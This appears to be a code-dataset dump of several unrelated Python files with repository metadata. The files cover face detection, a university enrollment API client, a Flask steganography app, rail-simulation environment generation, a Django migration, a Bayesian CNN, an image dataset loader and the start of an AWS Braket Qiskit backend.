
    cv2.imshow('video', frame)

    if faces.any():
        playsound.playsound('openDoorAlert.mp3', True)
        if len(faces) > 1:
            print("There are " + str(len(faces)) + " peoples at the gate")
        else:
            print("There is " + str(len(faces)) + " person at the gate")
    else:
        pass

    if cv2.waitKey(1) & 0xFF == ord('q'):
        sys.exit()
28.25
85
0.563154
0
0
0
0
0
0
0
0
314
0.252615
fe27fecf1f48f5d4699cad091ca66149a513fe9b
7,938
py
Python
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
sis/enrollments.py
ryanlovett/sis-cli
5efe5b9344b547c3f1365ef63a0ad33ec013fcca
[ "Apache-2.0" ]
null
null
null
# vim:set et sw=4 ts=4:

import logging
import sys

import jmespath

from . import sis, classes

# logging
logging.basicConfig(stream=sys.stdout, level=logging.WARNING)
logger = logging.getLogger(__name__)

# SIS endpoint
enrollments_uri = "https://apis.berkeley.edu/sis/v2/enrollments"

# apparently some courses have LAB without LEC (?)
section_codes = ['LEC', 'SES', 'WBL']


async def get_student_enrollments(app_id, app_key, identifier, term_id,
                                  id_type='campus-uid', enrolled_only='true',
                                  primary_only='true', course_attr='course-id'):
    '''Gets a students enrollments.'''
    uri = enrollments_uri + f"/students/{identifier}"
    headers = {
        "Accept": "application/json",
        "app_id": app_id,
        "app_key": app_key
    }
    params = {
        "page-number": 1,
        "page-size": 100, # maximum
        "id-type": id_type,
        "term-id": term_id,
        "enrolled-only": enrolled_only,
        "primary-only": primary_only,
    }

    enrollments = await sis.get_items(uri, params, headers, 'studentEnrollments')
    logger.debug(f"enrollments: {enrollments}")
    if course_attr == 'course-id':
        flt = '[].classSection.class.course.identifiers[?type == `cs-course-id`].id[]'
    elif course_attr == 'display-name':
        flt = '[].classSection.class.course.displayName'
    return jmespath.search(flt, enrollments)


async def get_section_enrollments(app_id, app_key, term_id, section_id):
    '''Gets a course section's enrollments.'''
    uri = enrollments_uri + f"/terms/{term_id}/classes/sections/{section_id}"
    headers = {
        "Accept": "application/json",
        "app_id": app_id,
        "app_key": app_key
    }
    params = {
        "page-number": 1,
        "page-size": 100, # maximum
    }
    enrollments = await sis.get_items(uri, params, headers, 'classSectionEnrollments')
    logger.info(f"{section_id}: {len(enrollments)}")
    return enrollments


def section_id(section):
    '''Return a section's course ID, e.g. "15807".'''
    return section['id']


def section_subject_area(section):
    '''Return a section's subject area, e.g. "STAT".'''
    return jmespath.search('class.course.subjectArea.code', section)


def section_catalog_number(section):
    '''Return a section's formatted catalog number, e.g. "215B".'''
    return jmespath.search('class.course.catalogNumber.formatted', section)


def section_display_name(section):
    '''Return a section's displayName, e.g. "STAT 215B".'''
    return jmespath.search('class.course.displayName', section)


def section_is_primary(section):
    '''Return a section's primary status.'''
    return jmespath.search('association.primary', section)


def enrollment_campus_uid(enrollment):
    '''Return an enrollent's campus UID.'''
    expr = "student.identifiers[?disclose && type=='campus-uid'].id | [0]"
    return jmespath.search(expr, enrollment)


def enrollment_campus_email(enrollment):
    '''Return an enrollment's campus email if found, otherwise return any other email.'''
    expr = "student.emails[?type.code=='CAMP'].emailAddress | [0]"
    email = jmespath.search(expr, enrollment)
    if email:
        return email
    expr = "student.emails[?type.code=='OTHR'].emailAddress | [0]"
    return jmespath.search(expr, enrollment)


def get_enrollment_uids(enrollments):
    '''Given an SIS enrollment, return the student's campus UID.'''
    return list(map(lambda x: enrollment_campus_uid(x), enrollments))


def get_enrollment_emails(enrollments):
    '''Given an SIS enrollment, return the student's campus email.'''
    return list(map(lambda x: enrollment_campus_email(x), enrollments))


def enrollment_status(enrollment):
    '''Return an enrollment's status, e.g. 'E', 'W', or 'D'.'''
    return jmespath.search('enrollmentStatus.status.code', enrollment)


def filter_enrollment_status(enrollments, status):
    return list(filter(lambda x: enrollment_status(x) == status, enrollments))


def status_code(constituents):
    return {'enrolled':'E', 'waitlisted':'W', 'dropped':'D'}[constituents]


async def get_students(term_id, class_number, constituents, credentials, exact, identifier='campus-uid'):
    '''Given a term and class section number, return the student ids.'''

    if exact:
        # get all enrollments for this section
        enrollments = await get_section_enrollments(
            credentials['enrollments_id'], credentials['enrollments_key'],
            term_id, class_number
        )
    else:
        # get the data for the specified section
        section = await classes.get_sections_by_id(
            credentials['classes_id'], credentials['classes_key'],
            term_id, class_number, include_secondary='true'
        )

        # extract the subject area and catalog number, e.g. STAT C8
        subject_area = section_subject_area(section)
        catalog_number = section_catalog_number(section)
        logger.info(f"{subject_area} {catalog_number}")

        # get enrollments in all matching sections
        enrollments = await get_enrollments(
            credentials['enrollments_id'], credentials['enrollments_key'],
            term_id, subject_area, catalog_number
        )

    if constituents == 'students':
        constituent_enrollments = enrollments
    else:
        # filter for those enrollments with a specific status code
        constituent_enrollments = filter_enrollment_status(
            enrollments, status_code(constituents))

    # function to extract an enrollment attribute
    if identifier == 'campus-uid':
        enrollment_attr_fn = enrollment_campus_uid
    else:
        enrollment_attr_fn = enrollment_campus_email

    logger.debug(f"constituent_enrollments: {constituent_enrollments}")

    # we convert to a set to collapse overlapping enrollments between
    # lectures and labs (if not exact)
    return set(map(lambda x: enrollment_attr_fn(x), constituent_enrollments))


def filter_lectures(sections, relevant_codes=section_codes):
    '''
    Given a list of SIS sections:
      [{'code': '32227', 'description': '2019 Spring ASTRON 128 001 LAB 001'}]
    return only the section codes which are lectures.
    '''
    codes = []
    for section in sections:
        if 'description' not in section:
            continue
        desc_words = set(section['description'].split())
        if len(set(desc_words) & set(relevant_codes)) > 0:
            codes.append(section['code'])
    return codes


async def get_lecture_section_ids(app_id, app_key, term_id, subject_area, catalog_number=None):
    '''
    Given a term, subject, and course number, return the lecture section ids.
    We only care about the lecture enrollments since they contain a superset of
    the enrollments of all other section types (lab, dis).
    '''
    uri = enrollments_uri + f'/terms/{term_id}/classes/sections/descriptors'
    headers = {
        "Accept": "application/json",
        "app_id": app_id,
        "app_key": app_key
    }
    params = {
        'page-number': 1,
        "subject-area-code": subject_area
    }
    if catalog_number:
        params["catalog-number"] = catalog_number

    # Retrieve the sections associated with the course which includes
    # both lecture and sections.
    sections = await sis.get_items(uri, params, headers, 'fieldValues')
    return filter_lectures(sections)


async def get_enrollments(app_id, app_key, term_id, subject_area, catalog_number):
    '''Gets a course's enrollments from the SIS.'''
    logger.info(f"get_enrollments: {subject_area} {catalog_number}")

    # get the lectures
    lecture_codes = await get_lecture_section_ids(app_id, app_key, term_id,
                                                  subject_area, catalog_number)

    # get the enrollments in each lecture
    enrollments = []
    for section_id in lecture_codes:
        enrollments += await get_section_enrollments(app_id, app_key, term_id, section_id)
    logger.info(f'enrollments: {len(enrollments)}')
    return enrollments
37.620853
105
0.68317
0
0
0
0
0
0
4,927
0.620685
3,272
0.412195
fe2900b93b3b942d3363b1695eb5a7b3920a90d6
1,913
py
Python
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
app.py
Nishanth-Gobi/Da-Vinci-Code
b44a2d0c553e4f9cf9e2bb3283ebb5f6eaecea4a
[ "MIT" ]
null
null
null
from flask import Flask, render_template, request, redirect, url_for
from os.path import join
from stego import Steganography

app = Flask(__name__)

UPLOAD_FOLDER = 'static/files/'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg'}


@app.route("/")
def home():
    return render_template('home.html')


@app.route("/encrypt", methods=['GET', 'POST'])
def get_image():
    if request.method == 'GET':
        return render_template('encrypt.html')

    # Check if the user has entered the secret message
    if 'file' in request.files and 'Secret' in request.values:
        uploaded_image = request.files['file']
        message = request.values.get('Secret')
        password = request.values.get("key")

        filepath = join(app.config['UPLOAD_FOLDER'], "cover_image.png")
        uploaded_image.save(filepath)

        im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
        im.encode(message=message)

        return render_template('encrypt.html', value=filepath, image_flag=True, secret_flag=True)

    return redirect(url_for('encrypt'))


@app.route("/decrypt", methods=['GET', 'POST'])
def get_image_to_decrypt():
    if request.method == 'GET':
        return render_template('decrypt.html')

    if 'key' in request.values:
        password = request.values.get('key')
        filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")

        im = Steganography(filepath=app.config['UPLOAD_FOLDER'], key=password)
        message = im.decode()

        return render_template('decrypt.html', value=filepath, message=message)

    if 'file' in request.files:
        uploaded_image = request.files['file']
        filepath = join(app.config['UPLOAD_FOLDER'], "stego_image.png")
        uploaded_image.save(filepath)

        return render_template('decrypt.html', value=filepath)


if __name__ == '__main__':
    app.run(debug=True)
31.360656
97
0.67747
0
0
0
0
1,581
0.826451
0
0
432
0.225823
fe292b4982f3dd8af18a6b88ccaadbbba6d158ef
8,012
py
Python
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
1
2021-02-21T02:54:35.000Z
2021-02-21T02:54:35.000Z
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
null
null
null
imitation_learning/generate_demonstrations/gen_envs.py
HaiDangDang/2020-flatland
abbf2f7f62fabf6da0937f80c2181f1c457ce24a
[ "MIT" ]
null
null
null
from flatland.envs.agent_utils import RailAgentStatus from flatland.envs.malfunction_generators import malfunction_from_params, MalfunctionParameters from flatland.envs.observations import GlobalObsForRailEnv from flatland.envs.rail_env import RailEnv from flatland.envs.rail_generators import sparse_rail_generator from flatland.envs.schedule_generators import sparse_schedule_generator from flatland.utils.rendertools import RenderTool import random import sys import os import time import msgpack import json from PIL import Image import argparse as ap def RandomTestParams(tid): seed = tid * 19997 + 997 random.seed(seed) width = 50 + random.randint(0, 100) height = 50 + random.randint(0, 100) nr_cities = 4 + random.randint(0, (width + height) // 10) nr_trains = min(nr_cities * 20, 100 + random.randint(0, 100)) max_rails_between_cities = 2 max_rails_in_cities = 3 + random.randint(0, 5) malfunction_rate = 30 + random.randint(0, 100) malfunction_min_duration = 3 + random.randint(0, 7) malfunction_max_duration = 20 + random.randint(0, 80) return ( seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration ) def RandomTestParams_small(tid): seed = tid * 19997 + 997 random.seed(seed) nSize = random.randint(0,5) width = 20 + nSize * 5 height = 20 + nSize * 5 nr_cities = 2 + nSize // 2 + random.randint(0,2) nr_trains = min(nr_cities * 5, 5 + random.randint(0,5)) #, 10 + random.randint(0, 10)) max_rails_between_cities = 2 max_rails_in_cities = 3 + random.randint(0, nSize) malfunction_rate = 30 + random.randint(0, 100) malfunction_min_duration = 3 + random.randint(0, 7) malfunction_max_duration = 20 + random.randint(0, 80) return ( seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration ) def ShouldRunTest(tid): return tid >= 7 #return tid >= 3 return True def create_test_env(fnParams, nTest, sDir): (seed, width, height, nr_trains, nr_cities, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration) = fnParams(nTest) #if not ShouldRunTest(test_id): # continue rail_generator = sparse_rail_generator( max_num_cities=nr_cities, seed=seed, grid_mode=False, max_rails_between_cities=max_rails_between_cities, max_rails_in_city=max_rails_in_cities, ) #stochastic_data = {'malfunction_rate': malfunction_rate, # 'min_duration': malfunction_min_duration, # 'max_duration': malfunction_max_duration # } stochastic_data = MalfunctionParameters(malfunction_rate=malfunction_rate, min_duration=malfunction_min_duration, max_duration=malfunction_max_duration ) observation_builder = GlobalObsForRailEnv() DEFAULT_SPEED_RATIO_MAP = { 1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. 
/ 4.: 0.25} schedule_generator = sparse_schedule_generator(DEFAULT_SPEED_RATIO_MAP) for iAttempt in range(5): try: env = RailEnv( width=width, height=height, rail_generator=rail_generator, schedule_generator=schedule_generator, number_of_agents=nr_trains, malfunction_generator_and_process_data=malfunction_from_params(stochastic_data), obs_builder_object=observation_builder, remove_agents_at_target=True ) obs = env.reset(random_seed = seed) break except ValueError as oErr: print("Error:", oErr) width += 5 height += 5 print("Try again with larger env: (w,h):", width, height) if not os.path.exists(sDir): os.makedirs(sDir) sfName = "{}/Level_{}.mpk".format(sDir, nTest) if os.path.exists(sfName): os.remove(sfName) env.save(sfName) sys.stdout.write(".") sys.stdout.flush() return env #env = create_test_env(RandomTestParams_small, 0, "train-envs-small/Test_0") def createEnvSet(nStart, nEnd, sDir, bSmall=True): #print("Generate small envs in train-envs-small:") print(f"Generate envs (small={bSmall}) in dir {sDir}:") sDirImages = "train-envs-small/images/" if not os.path.exists(sDirImages): os.makedirs(sDirImages) for test_id in range(nStart, nEnd, 1): env = create_test_env(RandomTestParams_small, test_id, sDir) oRender = RenderTool(env, gl="PILSVG") #oRender.env = env #oRender.set_new_rail() oRender.render_env() g2img = oRender.get_image() imgPIL = Image.fromarray(g2img) #imgPIL.show() imgPIL.save(sDirImages + "Level_{}.png".format(test_id)) # print("Generate large envs in train-envs-1000:") # for test_id in range(100): # create_test_env(RandomTestParams, test_id, "train-envs-1000/Test_0") def merge(sfEpisode, sfEnv, sfEnvOut, bJson=False): if bJson: with open(sfEpisode, "rb") as fEp: oActions = json.load(fEp) oEp = {"actions":oActions} print("json oEp:", type(oEp), list(oEp.keys())) else: with open(sfEpisode, "rb") as fEp: oEp = msgpack.load(fEp) print("oEp:", type(oEp), list(oEp.keys())) with open(sfEnv, "rb") as fEnv: oEnv = msgpack.load(fEnv) print("oEnv:", type(oEnv), list(oEnv.keys())) # merge dicts oEnv2 = {**oEp, **oEnv} print("Merged keys:", list(oEnv2.keys())) with open(sfEnvOut, "wb") as fEnv: msgpack.dump(oEnv2, fEnv) def printKeys1(sfEnv): with open(sfEnv, "rb") as fEnv: oEnv = msgpack.load(fEnv, encoding="utf-8") print(sfEnv, "keys:", list(oEnv.keys())) for sKey in oEnv.keys(): print("key", sKey, len(oEnv[sKey])) if sKey == "shape": print("shape: ", oEnv[sKey] ) def printKeys(sfEnvs): try: for sfEnv in sfEnvs: printKeys1(sfEnv) except: # assume single env printKeys1(sfEnvs) def main2(): parser = ap.ArgumentParser(description='Generate envs, merge episodes into env files.') parser.add_argument("-c", '--createEnvs', type=int, nargs=2, action="append", metavar=("nStart", "nEnd"), help='merge episode into env') parser.add_argument("-d", "--outDir", type=str, nargs=1, default="./test-envs-tmp") parser.add_argument("-m", '--merge', type=str, nargs=3, action="append", metavar=("episode", "env", "output_env"), help='merge episode into env') parser.add_argument("-j", '--mergejson', type=str, nargs=3, action="append", metavar=("json", "env", "output_env"), help='merge json actions into env, with key actions') parser.add_argument('-k', "--keys", type=str, action='append', nargs="+", help='print the keys in a file') args=parser.parse_args() print(args) if args.merge: print("merge:", args.merge) merge(*args.merge[0]) if args.mergejson: print("merge json:", args.mergejson) merge(*args.mergejson[0], bJson=True) if args.keys: print("keys:", args.keys) printKeys(args.keys[0]) if args.outDir: 
print("outDir", args.outDir) if args.createEnvs: print("create Envs - ", *args.createEnvs[0]) createEnvSet(*args.createEnvs[0], sDir=args.outDir) if __name__=="__main__": main2()
29.240876
96
0.623689
0
0
0
0
0
0
0
0
1,333
0.166375
fe2b48a6665b98787ac1bd205fe634201bd2120e
1,480
py
Python
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
job-queue-portal/postgres_django_queue/djangoenv/lib/python3.8/site-packages/django_celery_results/migrations/0006_taskresult_date_created.py
Sruthi-Ganesh/postgres-django-queue
4ea8412c073ff8ceb0efbac48afc29456ae11346
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*-
# Generated by Django 2.2.4 on 2019-08-21 19:53

# this file is auto-generated so don't do flake8 on it
# flake8: noqa

from __future__ import absolute_import, unicode_literals

from django.db import migrations, models
import django.utils.timezone


def copy_date_done_to_date_created(apps, schema_editor):
    TaskResult = apps.get_model('django_celery_results', 'taskresult')
    db_alias = schema_editor.connection.alias
    TaskResult.objects.using(db_alias).all().update(
        date_created=models.F('date_done')
    )


def reverse_copy_date_done_to_date_created(app, schema_editor):
    # the reverse of 'copy_date_done_to_date_created' is do nothing
    # because the 'date_created' will be removed.
    pass


class Migration(migrations.Migration):

    dependencies = [
        ('django_celery_results', '0005_taskresult_worker'),
    ]

    operations = [
        migrations.AddField(
            model_name='taskresult',
            name='date_created',
            field=models.DateTimeField(
                auto_now_add=True,
                db_index=True,
                default=django.utils.timezone.now,
                help_text='Datetime field when the task result was created in UTC',
                verbose_name='Created DateTime'
            ),
            preserve_default=False,
        ),
        migrations.RunPython(copy_date_done_to_date_created,
                             reverse_copy_date_done_to_date_created),
    ]
30.204082
83
0.664189
734
0.495946
0
0
0
0
0
0
439
0.296622
fe2bf5d430a026df243c522eca3e9b1d054d0492
45
py
Python
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
remediar/modules/http/__init__.py
fabaff/remediar
014d7733b00cd40a45881c2729c04df5584476e7
[ "Apache-2.0" ]
null
null
null
"""Support for HTTP or web server issues."""
22.5
44
0.688889
0
0
0
0
0
0
0
0
44
0.977778
fe2e74a698807b4b6d0cf881031198f5da548dd4
1,891
py
Python
Image Recognition/utils/BayesianModels/Bayesian3Conv3FC.py
AlanMorningLight/PyTorch-BayesianCNN
5de7133f09dd10135bf605efbdd26c18f2a4df13
[ "MIT" ]
1
2020-02-10T12:58:25.000Z
2020-02-10T12:58:25.000Z
utils/BayesianModels/Bayesian3Conv3FC.py
SulemanKhurram/ThesisExperiments
4fdf7b6558c87a096dcdc374c35085ac946d3a58
[ "MIT" ]
null
null
null
utils/BayesianModels/Bayesian3Conv3FC.py
SulemanKhurram/ThesisExperiments
4fdf7b6558c87a096dcdc374c35085ac946d3a58
[ "MIT" ]
null
null
null
import torch.nn as nn
from utils.BBBlayers import BBBConv2d, BBBLinearFactorial, FlattenLayer


class BBB3Conv3FC(nn.Module):
    """
    Simple Neural Network having 3 Convolution
    and 3 FC layers with Bayesian layers.
    """
    def __init__(self, outputs, inputs):
        super(BBB3Conv3FC, self).__init__()

        self.conv1 = BBBConv2d(inputs, 32, 5, stride=1, padding=2)
        self.soft1 = nn.Softplus()
        self.pool1 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.conv2 = BBBConv2d(32, 64, 5, stride=1, padding=2)
        self.soft2 = nn.Softplus()
        self.pool2 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.conv3 = BBBConv2d(64, 128, 5, stride=1, padding=1)
        self.soft3 = nn.Softplus()
        self.pool3 = nn.MaxPool2d(kernel_size=3, stride=2)

        self.flatten = FlattenLayer(2 * 2 * 128)
        self.fc1 = BBBLinearFactorial(2 * 2 * 128, 1000)
        self.soft5 = nn.Softplus()

        self.fc2 = BBBLinearFactorial(1000, 1000)
        self.soft6 = nn.Softplus()

        self.fc3 = BBBLinearFactorial(1000, outputs)

        layers = [self.conv1, self.soft1, self.pool1, self.conv2, self.soft2, self.pool2,
                  self.conv3, self.soft3, self.pool3, self.flatten, self.fc1, self.soft5,
                  self.fc2, self.soft6, self.fc3]

        self.layers = nn.ModuleList(layers)

    def probforward(self, x):
        'Forward pass with Bayesian weights'
        kl = 0
        for layer in self.layers:
            if hasattr(layer, 'convprobforward') and callable(layer.convprobforward):
                x, _kl, = layer.convprobforward(x)
                kl += _kl

            elif hasattr(layer, 'fcprobforward') and callable(layer.fcprobforward):
                x, _kl, = layer.fcprobforward(x)
                kl += _kl
            else:
                x = layer(x)
        logits = x
        return logits, kl
35.679245
89
0.599683
1,796
0.949762
0
0
0
0
0
0
169
0.089371
fe2fc61a568a0e2538b7b1f99349a5186a485475
8,657
py
Python
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
custom_scripts/load_animals.py
nphilou/influence-release
bcf3603705b6ff172bcb62123aef0248afa77a05
[ "MIT" ]
null
null
null
import os from tensorflow.contrib.learn.python.learn.datasets import base import numpy as np import IPython from subprocess import call from keras.preprocessing import image from influence.dataset import DataSet from influence.inception_v3 import preprocess_input BASE_DIR = 'data' # TODO: change def fill(X, Y, idx, label, img_path, img_side): img = image.load_img(img_path, target_size=(img_side, img_side)) x = image.img_to_array(img) X[idx, ...] = x Y[idx] = label def extract_and_rename_animals(): class_maps = [ ('dog', 'n02084071'), ('cat', 'n02121808'), ('bird', 'n01503061'), ('fish', 'n02512053'), ('horse', 'n02374451'), ('monkey', 'n02484322'), ('zebra', 'n02391049'), ('panda', 'n02510455'), ('lemur', 'n02496913'), ('wombat', 'n01883070'), ] for class_string, class_id in class_maps: class_dir = os.path.join(BASE_DIR, class_string) print(class_dir) call('mkdir %s' % class_dir, shell=True) call('tar -xf %s.tar -C %s' % (os.path.join(BASE_DIR, class_id), class_dir), shell=True) for filename in os.listdir(class_dir): file_idx = filename.split('_')[1].split('.')[0] src_filename = os.path.join(class_dir, filename) dst_filename = os.path.join(class_dir, '%s_%s.JPEG' % (class_string, file_idx)) os.rename(src_filename, dst_filename) def load_animals(num_train_ex_per_class=300, num_test_ex_per_class=100, num_valid_ex_per_class=0, classes=None, ): num_channels = 3 img_side = 299 if num_valid_ex_per_class == 0: valid_str = '' else: valid_str = '_valid-%s' % num_valid_examples if classes is None: classes = ['dog', 'cat', 'bird', 'fish', 'horse', 'monkey', 'zebra', 'panda', 'lemur', 'wombat'] data_filename = os.path.join(BASE_DIR, 'dataset_train-%s_test-%s%s.npz' % (num_train_ex_per_class, num_test_ex_per_class, valid_str)) else: data_filename = os.path.join(BASE_DIR, 'dataset_%s_train-%s_test-%s%s.npz' % ('-'.join(classes), num_train_ex_per_class, num_test_ex_per_class, valid_str)) num_classes = len(classes) num_train_examples = num_train_ex_per_class * num_classes num_test_examples = num_test_ex_per_class * num_classes num_valid_examples = num_valid_ex_per_class * num_classes if os.path.exists(data_filename): print('Loading animals from disk...') f = np.load(data_filename) X_train = f['X_train'] X_test = f['X_test'] Y_train = f['Y_train'] Y_test = f['Y_test'] if 'X_valid' in f: X_valid = f['X_valid'] else: X_valid = None if 'Y_valid' in f: Y_valid = f['Y_valid'] else: Y_valid = None else: print('Reading animals from raw images...') X_train = np.zeros([num_train_examples, img_side, img_side, num_channels]) X_test = np.zeros([num_test_examples, img_side, img_side, num_channels]) # X_valid = np.zeros([num_valid_examples, img_side, img_side, num_channels]) X_valid = None Y_train = np.zeros([num_train_examples]) Y_test = np.zeros([num_test_examples]) # Y_valid = np.zeros([num_valid_examples]) Y_valid = None for class_idx, class_string in enumerate(classes): print('class: %s' % class_string) # For some reason, a lot of numbers are skipped. 
i = 0 num_filled = 0 while num_filled < num_train_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) print(img_path) if os.path.exists(img_path): fill(X_train, Y_train, num_filled + (num_train_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 num_filled = 0 while num_filled < num_test_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) if os.path.exists(img_path): fill(X_test, Y_test, num_filled + (num_test_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 num_filled = 0 while num_filled < num_valid_ex_per_class: img_path = os.path.join(BASE_DIR, '%s/%s_%s.JPEG' % (class_string, class_string, i)) if os.path.exists(img_path): fill(X_valid, Y_valid, num_filled + (num_valid_ex_per_class * class_idx), class_idx, img_path, img_side) num_filled += 1 print(num_filled) i += 1 X_train = preprocess_input(X_train) X_test = preprocess_input(X_test) X_valid = preprocess_input(X_valid) np.random.seed(0) permutation_idx = np.arange(num_train_examples) np.random.shuffle(permutation_idx) X_train = X_train[permutation_idx, :] Y_train = Y_train[permutation_idx] permutation_idx = np.arange(num_test_examples) np.random.shuffle(permutation_idx) X_test = X_test[permutation_idx, :] Y_test = Y_test[permutation_idx] permutation_idx = np.arange(num_valid_examples) np.random.shuffle(permutation_idx) X_valid = X_valid[permutation_idx, :] Y_valid = Y_valid[permutation_idx] np.savez_compressed(data_filename, X_train=X_train, Y_train=Y_train, X_test=X_test, Y_test=Y_test, X_valid=X_valid, Y_valid=Y_valid) train = DataSet(X_train, Y_train) if (X_valid is not None) and (Y_valid is not None): # validation = DataSet(X_valid, Y_valid) validation = None else: validation = None test = DataSet(X_test, Y_test) return base.Datasets(train=train, validation=validation, test=test) def load_koda(): num_channels = 3 img_side = 299 data_filename = os.path.join(BASE_DIR, 'dataset_koda.npz') if os.path.exists(data_filename): print('Loading Koda from disk...') f = np.load(data_filename) X = f['X'] Y = f['Y'] else: # Returns all class 0 print('Reading Koda from raw images...') image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg'))] # Hack to get the image files in the right order # image_files = [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and not image_file.startswith('124'))] # image_files += [image_file for image_file in os.listdir(os.path.join(BASE_DIR, 'koda')) if (image_file.endswith('.jpg') and image_file.startswith('124'))] num_examples = len(image_files) X = np.zeros([num_examples, img_side, img_side, num_channels]) Y = np.zeros([num_examples]) class_idx = 0 for counter, image_file in enumerate(image_files): img_path = os.path.join(BASE_DIR, 'koda', image_file) fill(X, Y, counter, class_idx, img_path, img_side) X = preprocess_input(X) np.savez(data_filename, X=X, Y=Y) return X, Y def load_dogfish_with_koda(): classes = ['dog', 'fish'] X_test, Y_test = load_koda() data_sets = load_animals(num_train_ex_per_class=900, num_test_ex_per_class=300, num_valid_ex_per_class=0, classes=classes) train = data_sets.train validation = data_sets.validation test = DataSet(X_test, Y_test) return base.Datasets(train=train, validation=validation, test=test) def load_dogfish_with_orig_and_koda(): classes = ['dog', 'fish'] X_test, Y_test = 
load_koda() X_test = np.reshape(X_test, (X_test.shape[0], -1)) data_sets = load_animals(num_train_ex_per_class=900, num_test_ex_per_class=300, num_valid_ex_per_class=0, classes=classes) train = data_sets.train validation = data_sets.validation test = DataSet( np.concatenate((data_sets.test.x, X_test), axis=0), np.concatenate((data_sets.test.labels, Y_test), axis=0)) return base.Datasets(train=train, validation=validation, test=test)
35.479508
167
0.611644
0
0
0
0
0
0
0
0
1,301
0.150283
fe2fd1a403e44db33fca9bd236a441a4df247ba1
13,000
py
Python
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
7
2020-09-25T17:16:54.000Z
2021-05-20T10:42:52.000Z
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
4
2020-09-21T19:33:39.000Z
2020-09-22T12:21:11.000Z
src/qiskit_aws_braket_provider/awsbackend.py
carstenblank/qiskit-aws-braket-provider
539f0c75c2ccf1f6e5e981b92ea74f497fcba237
[ "Apache-2.0" ]
1
2020-09-21T19:32:16.000Z
2020-09-21T19:32:16.000Z
# Copyright 2020 Carsten Blank # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import logging from datetime import datetime, timedelta from braket.device_schema.device_service_properties_v1 import DeviceCost from typing import List, Dict, Optional, Any, Union, Tuple from botocore.response import StreamingBody from braket.aws import AwsDevice, AwsQuantumTask, AwsSession from braket.circuits import Circuit from braket.device_schema import DeviceCapabilities from braket.device_schema.ionq import IonqDeviceCapabilities from braket.device_schema.rigetti import RigettiDeviceCapabilities from braket.device_schema.simulators import GateModelSimulatorDeviceCapabilities from qiskit.providers import BaseBackend, JobStatus from qiskit.providers.models import QasmBackendConfiguration, BackendProperties, BackendStatus from qiskit.qobj import QasmQobj from . import awsjob from . import awsprovider from .conversions_configuration import aws_device_2_configuration from .conversions_properties import aws_ionq_to_properties, aws_rigetti_to_properties, aws_simulator_to_properties from .transpilation import convert_qasm_qobj logger = logging.getLogger(__name__) class AWSBackend(BaseBackend): _aws_device: AwsDevice _configuration: QasmBackendConfiguration _provider: 'awsprovider.AWSProvider' def __init__(self, aws_device: AwsDevice, provider: 'awsprovider.AWSProvider' = None): 